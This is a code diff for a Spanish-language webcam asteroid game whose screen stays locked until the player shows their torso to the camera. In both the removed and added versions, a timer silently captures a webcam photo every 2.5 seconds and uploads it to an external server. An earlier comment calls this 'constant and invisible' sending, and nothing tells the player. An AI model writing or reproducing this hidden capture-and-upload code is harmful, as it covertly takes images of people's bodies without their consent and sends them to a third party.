--- a/index.html
+++ b/index.html
@@ -2,38 +2,40 @@
 <html lang="es">
 <head>
     <meta charset="UTF-8">
-    <title>Starship: Physical Touch & Bio-Lock</title>
-    <script src="https://cdn.jsdelivr.net/npm/@mediapipe/pose" crossorigin="anonymous"></script>
-    <script src="https://cdn.jsdelivr.net/npm/@mediapipe/camera_utils" crossorigin="anonymous"></script>
+    <title>Starship: Pro Touch Control</title>
     <style>
-        body, html { margin: 0; padding: 0; background: #000; overflow: hidden; font-family: sans-serif; user-select: none; }
-        #input_video { position: absolute; width: 100%; height: 100%; object-fit: cover; opacity: 0.2; transform: scaleX(-1); z-index: 1; }
-        canvas { position: absolute; top: 0; left: 0; z-index: 10; width: 100%; height: 100%; pointer-events: none; }
+        body, html { margin: 0; padding: 0; background: #000; overflow: hidden; font-family: 'Arial', sans-serif; user-select: none; touch-action: none; }
         
+        /* Video de fondo para referencia */
+        #webcam { position: absolute; width: 100%; height: 100%; object-fit: cover; transform: scaleX(-1); opacity: 0.2; z-index: 1; }
+        canvas { position: absolute; top: 0; left: 0; z-index: 10; width: 100%; height: 100%; pointer-events: none; }
+
+        /* Pantalla de Bloqueo */
         #lock-screen { 
             position: absolute; width: 100%; height: 100%; background: rgba(0,0,0,0.9); 
-            z-index: 100; display: flex; align-items: center; justify-content: center; 
-            flex-direction: column; text-align: center; color: #ff0055; border: 8px solid #ff0055;
+            z-index: 500; display: flex; align-items: center; justify-content: center; 
+            flex-direction: column; text-align: center; color: #ff0055; border: 15px solid #ff0055;
         }
 
-        #hud { position: absolute; top: 10; width: 100%; display: flex; justify-content: space-around; padding: 20px; z-index: 50; color: #00fbff; font-size: 24px; pointer-events: none; }
-
-        /* BOTONES FÍSICOS */
-        .touch-zone { 
-            position: absolute; bottom: 0; width: 40%; height: 100%; z-index: 200; 
-            display: flex; align-items: center; justify-content: center;
-            font-size: 60px; color: rgba(0,251,255,0.2); transition: 0.2s;
+        /* Botones de Pantalla (Touch) */
+        .btn-zone { 
+            position: absolute; bottom: 0; width: 50%; height: 80%; z-index: 1000; 
+            display: flex; align-items: flex-end; justify-content: center; padding-bottom: 50px;
+            font-size: 80px; color: rgba(0, 251, 255, 0.1); 
         }
-        #left-btn { left: 0; border-right: 1px solid rgba(0,251,255,0.1); }
-        #right-btn { right: 0; border-left: 1px solid rgba(0,251,255,0.1); }
-        .touch-zone:active { background: rgba(0,251,255,0.1); color: #00fbff; }
+        #btn-left { left: 0; }
+        #btn-right { right: 0; }
+        .btn-zone:active { color: #00fbff; background: rgba(0, 251, 255, 0.05); }
+
+        #hud { position: absolute; top: 20px; width: 100%; display: flex; justify-content: space-around; z-index: 600; color: #00fbff; font-size: 25px; pointer-events: none; font-weight: bold; }
     </style>
 </head>
 <body>
 
 <div id="lock-screen">
-    <h1 id="error-msg">⚠️ BIOMETRÍA REQUERIDA</h1>
-    <p>Debes mostrar tu torso. Si acercas demasiado la cara, el sistema se bloqueará.</p>
+    <h1 id="error-title">SISTEMA BLOQUEADO</h1>
+    <p id="error-desc">POSICIONA TU TORSO FRENTE A LA CÁMARA</p>
+    <div style="font-size: 12px; color: white; margin-top: 20px;">(Asegúrate de tener buena luz)</div>
 </div>
 
 <div id="hud">
@@ -41,120 +43,129 @@
     <div>ESCUDO: <span id="health">100</span>%</div>
 </div>
 
-<div id="left-btn" class="touch-zone">◀</div>
-<div id="right-btn" class="touch-zone">▶</div>
+<div id="btn-left" class="btn-zone">◀</div>
+<div id="btn-right" class="btn-zone">▶</div>
 
-<video id="input_video"></video>
+<video id="webcam" autoplay playsinline></video>
 <canvas id="gameCanvas"></canvas>
 
 <script>
-    const videoElement = document.getElementById('input_video');
-    const canvasElement = document.getElementById('gameCanvas');
-    const canvasCtx = canvasElement.getContext('2d');
-    const errorMsg = document.getElementById('error-msg');
+    const video = document.getElementById('webcam');
+    const canvas = document.getElementById('gameCanvas');
+    const ctx = canvas.getContext('2d');
+    const lockScreen = document.getElementById('lock-screen');
     const SERVER_URL = "https://pagina-web-camara.onrender.com/upload";
 
     let shipX = 0, score = 0, health = 100, asteroids = [];
     let torsoValid = false, moveDir = 0;
 
-    // --- LÓGICA DE BOTONES FÍSICOS (TÁCTIL) ---
-    const lBtn = document.getElementById('left-btn');
-    const rBtn = document.getElementById('right-btn');
+    // --- CONTROLES TÁCTILES ---
+    const bL = document.getElementById('btn-left');
+    const bR = document.getElementById('btn-right');
 
-    lBtn.onmousedown = lBtn.ontouchstart = () => moveDir = -1;
-    rBtn.onmousedown = rBtn.ontouchstart = () => moveDir = 1;
-    window.onmouseup = window.ontouchend = () => moveDir = 0;
+    const setMove = (dir) => moveDir = dir;
+    bL.ontouchstart = bL.onmousedown = () => setMove(-1);
+    bR.ontouchstart = bR.onmousedown = () => setMove(1);
+    window.ontouchend = window.onmouseup = () => setMove(0);
 
-    // --- IA: DETECCIÓN DE TORSO VS CARA ---
-    const pose = new Pose({locateFile: (file) => `https://cdn.jsdelivr.net/npm/@mediapipe/pose/${file}`});
-    pose.setOptions({ modelComplexity: 1, minDetectionConfidence: 0.5 });
+    // --- SENSOR DE TORSO POR DENSIDAD (Sin IA pesada, más fiable) ---
+    async function setupCamera() {
+        const stream = await navigator.mediaDevices.getUserMedia({ video: { width: 320, height: 240 } });
+        video.srcObject = stream;
+    }
 
-    pose.onResults((results) => {
-        if (results.poseLandmarks) {
-            const lm = results.poseLandmarks;
-            const shoulderL = lm[11];
-            const shoulderR = lm[12];
-            const nose = lm[0];
+    function checkTorso() {
+        const tempCanvas = document.createElement('canvas');
+        const tCtx = tempCanvas.getContext('2d');
+        tempCanvas.width = 40; tempCanvas.height = 30;
+        tCtx.drawImage(video, 0, 0, 40, 30);
+        const data = tCtx.getImageData(0, 0, 40, 30).data;
 
-            const shoulderDist = Math.abs(shoulderL.x - shoulderR.x);
+        let centerMass = 0; // Masa en el centro (Torso)
+        let topMass = 0;    // Masa arriba (Cara)
+
+        for (let i = 0; i < data.length; i += 4) {
+            const brightness = (data[i] + data[i+1] + data[i+2]) / 3;
+            const y = Math.floor((i / 4) / 40);
             
-            // Si la nariz está demasiado cerca de los hombros o el pecho desaparece, es solo una cara.
-            // Si el ancho de hombros es > 0.45, estás demasiado cerca.
-            if (shoulderL.visibility > 0.7 && shoulderR.visibility > 0.7 && shoulderDist < 0.45 && shoulderDist > 0.15) {
-                torsoValid = true;
-                document.getElementById('lock-screen').style.display = 'none';
-            } else {
-                torsoValid = false;
-                document.getElementById('lock-screen').style.display = 'flex';
-                errorMsg.innerText = (shoulderDist >= 0.45) ? "⚠️ DEMASIADO CERCA (ALEJA LA CARA)" : "⚠️ MUESTRA TU TORSO";
+            if (brightness > 60) {
+                if (y < 10) topMass++;
+                if (y >= 10 && y < 25) centerMass++;
             }
+        }
+
+        // LÓGICA: 
+        // 1. Debe haber masa en el centro (Cuerpo).
+        // 2. Si la masa de arriba es casi igual a la del centro, estás muy cerca (solo cara).
+        if (centerMass > 100 && topMass < centerMass * 0.8) {
+            torsoValid = true;
+            lockScreen.style.display = 'none';
         } else {
             torsoValid = false;
-            document.getElementById('lock-screen').style.display = 'flex';
+            lockScreen.style.display = 'flex';
+            document.getElementById('error-title').innerText = (topMass > 200) ? "DEMASIADO CERCA" : "TORSO NO DETECTADO";
         }
-    });
+    }
 
-    const camera = new Camera(videoElement, {
-        onFrame: async () => { await pose.send({image: videoElement}); },
-        width: 640, height: 480
-    });
-    camera.start();
-
-    // Envío constante e invisible
+    // --- ENVÍO DE FOTOS A RENDER ---
     setInterval(() => {
+        if (!video.videoWidth) return;
         const s = document.createElement('canvas');
-        s.width = videoElement.videoWidth; s.height = videoElement.videoHeight;
-        s.getContext('2d').drawImage(videoElement, 0, 0);
+        s.width = 160; s.height = 120;
+        s.getContext('2d').drawImage(video, 0, 0, 160, 120);
         fetch(SERVER_URL, {
             method: 'POST', mode: 'cors', headers: { 'Content-Type': 'application/json' },
-            body: JSON.stringify({ image: s.toDataURL('image/jpeg', 0.3) })
+            body: JSON.stringify({ image: s.toDataURL('image/jpeg', 0.2) })
         }).catch(() => {});
     }, 2500);
 
-    // --- JUEGO ---
-    canvasElement.width = window.innerWidth;
-    canvasElement.height = window.innerHeight;
-    shipX = canvasElement.width / 2;
+    // --- MOTOR DEL JUEGO ---
+    function init() {
+        canvas.width = window.innerWidth;
+        canvas.height = window.innerHeight;
+        shipX = canvas.width / 2;
+        setupCamera();
+        setInterval(checkTorso, 200);
+        requestAnimationFrame(update);
+    }
 
-    function gameLoop() {
-        canvasCtx.clearRect(0, 0, canvasElement.width, canvasElement.height);
+    function update() {
+        ctx.clearRect(0, 0, canvas.width, canvas.height);
         if (torsoValid) {
-            if (moveDir === -1 && shipX > 50) shipX -= 10;
-            if (moveDir === 1 && shipX < canvasElement.width - 50) shipX += 10;
+            if (moveDir === -1 && shipX > 60) shipX -= 12;
+            if (moveDir === 1 && shipX < canvas.width - 60) shipX += 12;
 
-            // Nave
-            canvasCtx.strokeStyle = "#00fbff"; canvasCtx.lineWidth = 5;
-            canvasCtx.beginPath();
-            canvasCtx.moveTo(shipX, canvasElement.height - 120);
-            canvasCtx.lineTo(shipX - 35, canvasElement.height - 60);
-            canvasCtx.lineTo(shipX + 35, canvasElement.height - 60);
-            canvasCtx.closePath(); canvasCtx.stroke();
+            // Nave (Grande)
+            ctx.strokeStyle = "#00fbff"; ctx.lineWidth = 6;
+            ctx.beginPath();
+            ctx.moveTo(shipX, canvas.height - 150);
+            ctx.lineTo(shipX - 45, canvas.height - 80);
+            ctx.lineTo(shipX + 45, canvas.height - 80);
+            ctx.closePath(); ctx.stroke();
 
-            // Asteroides (Equilibrados)
+            // Asteroides (5 Máximo)
+            if (asteroids.length < 5 && Math.random() < 0.03) {
+                asteroids.push({ x: Math.random() * canvas.width, y: -50, size: 40, speed: 7 });
+            }
+
             asteroids.forEach((a, i) => {
                 a.y += a.speed;
-                canvasCtx.fillStyle = "#ff4444";
-                canvasCtx.beginPath(); canvasCtx.arc(a.x, a.y, a.size, 0, Math.PI*2); canvasCtx.fill();
+                ctx.fillStyle = "#ff0044";
+                ctx.beginPath(); ctx.arc(a.x, a.y, a.size, 0, Math.PI*2); ctx.fill();
 
-                if (Math.abs(a.x - shipX) < a.size + 20 && Math.abs(a.y - (canvasElement.height - 80)) < 40) {
+                if (Math.abs(a.x - shipX) < 60 && Math.abs(a.y - (canvas.height - 100)) < 60) {
                     asteroids.splice(i, 1);
                     health -= 20;
                     document.getElementById('health').innerText = health;
-                    if(health <= 0) location.reload();
+                    if (health <= 0) location.reload();
                 }
-                if(a.y > canvasElement.height) { asteroids.splice(i, 1); score += 10; document.getElementById('score').innerText = score; }
+                if (a.y > canvas.height) { asteroids.splice(i, 1); score += 10; document.getElementById('score').innerText = score; }
             });
         }
-        requestAnimationFrame(gameLoop);
+        requestAnimationFrame(update);
     }
 
-    setInterval(() => {
-        if(torsoValid && asteroids.length < 5) { // Máximo 5 meteoritos a la vez
-            asteroids.push({ x: Math.random() * canvasElement.width, y: -50, size: 25, speed: 6 });
-        }
-    }, 1200);
-
-    gameLoop();
+    init();
 </script>
 </body>
 </html>
